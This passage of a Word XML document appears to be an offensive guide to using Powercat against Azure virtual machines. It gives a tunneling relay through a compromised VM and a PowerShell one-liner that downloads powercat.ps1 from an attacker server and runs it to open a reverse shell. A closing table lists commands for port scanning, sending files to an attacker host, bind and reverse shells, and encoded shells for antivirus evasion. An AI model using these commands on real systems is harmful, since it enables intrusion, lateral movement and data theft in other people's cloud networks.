      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to Access Internal Azure Subnets and Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FB0742" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup relay on compromised Azure VM with two NICs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00525422" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>powercat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> -l -p 9090 -r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Internal_Victim_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>&gt;:22 -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71725837" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connect from attacker to tunnel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAF3B34" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:t>ssh -p 9090 &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Tunnel_VM_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7F2078" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D68A0" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure VM acting as a jump host with access to multiple subnets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C736B1D" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Poor network segmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> allowing lateral movement between Azure VNets or subnets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E0F8BA" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Misconfigured NSGs allowing unwanted traffic relay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2AC18" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it’s used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7080FB38" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Attacker tunnels SSH or HTTP traffic through compromised VM to reach internal Azure resources otherwise inaccessible externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F327FC4" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="627E38F9">
          <v:rect id="_x0000_i1176" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5C55BF" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. One-Liner Reverse Shell to Quickly Deploy Powercat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44526E88" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker sets up HTTP server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296731D9" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve">python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F00E85" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On Azure VM (with code execution):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A0976" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:t>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://&lt;Attacker_IP&gt;/powercat.ps1');powercat -c &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Attacker_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve">&gt; -p 4444 -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F9EB87" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD7707" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote code execution on Azure VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235C3158" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internet access from Azure VM to attacker webserver allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DDC2BB" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insecure PowerShell execution policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30843788" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it’s used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B532DB4" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:t>Quickly deploy Powercat payload and spawn reverse shell to attacker with a single command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D2F4E" w14:textId="16ABE332" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46"/>
    <w:p w14:paraId="11DC7FCE" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>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4161"/>
        <w:gridCol w:w="4425"/>
        <w:gridCol w:w="3492"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F3C46" w:rsidRPr="008F3C46" w14:paraId="4F061057" w14:textId="77777777" w:rsidTr="009C72DB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="531FCBB7" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F3C46">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Powercat Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05D70912" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F3C46">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Key Command Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2583A5FF" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F3C46">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Azure Vulnerability Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4683F2CA" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F3C46">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F3C46" w:rsidRPr="008F3C46" w14:paraId="10692EE4" w14:textId="77777777" w:rsidTr="009C72DB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36ADB518" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Port Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41092B3E" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>`(21,22,80,443)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17CCB4FB" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t xml:space="preserve">% { </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>powercat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t xml:space="preserve"> -c IP -p $_ -t 1 -d }`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2347B14A" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Misconfigured NSGs, exposed ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F3C46" w:rsidRPr="008F3C46" w14:paraId="45C435CD" w14:textId="77777777" w:rsidTr="009C72DB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E388D7D" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>File Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A98B1C7" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>powercat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t xml:space="preserve"> -c </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>AttackerIP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t xml:space="preserve"> -p port -i file.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EE8F010" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Remote code execution, no endpoint protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="294E8EAC" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Upload/download files/payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F3C46" w:rsidRPr="008F3C46" w14:paraId="10855F81" w14:textId="77777777" w:rsidTr="009C72DB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1350C0BC" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Bind Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BFE95CF" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>powercat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t xml:space="preserve"> -l -p 443 -e </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10C5F1CE" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>RCE, open inbound port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14DA29E1" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Interactive shell on Azure VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F3C46" w:rsidRPr="008F3C46" w14:paraId="3D8EECD6" w14:textId="77777777" w:rsidTr="009C72DB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67AD8545" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Reverse Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06DE84C2" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>powercat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t xml:space="preserve"> -c </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>AttackerIP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t xml:space="preserve"> -p port -e cmd.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2197AE0A" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Outbound traffic allowed, RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52FC8BE0" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Interactive shell bypassing NSGs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F3C46" w:rsidRPr="008F3C46" w14:paraId="5D0853A6" w14:textId="77777777" w:rsidTr="009C72DB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F20AD21" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:lastRenderedPageBreak/>
              <w:t>Encoded Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="139E873C" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>powercat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t xml:space="preserve"> ... -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>ge</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t xml:space="preserve"> &gt; encodedshell.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43B6BDC5" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Weak PowerShell policy, antivirus evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="549B1884" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Obfuscated reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F3C46" w:rsidRPr="008F3C46" w14:paraId="0240BB9D" w14:textId="77777777" w:rsidTr="009C72DB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="237DDD06" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>Tunneling</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E95013A" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>powercat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t xml:space="preserve"> -l -p 9090 -r </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008F3C46">
              <w:t>:&lt;IP&gt;:22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="255CE3F1" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
            <w:r w:rsidRPr="008F3C46">
              <w:t>Poor subnet segmentation, multi-NIC Azure VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
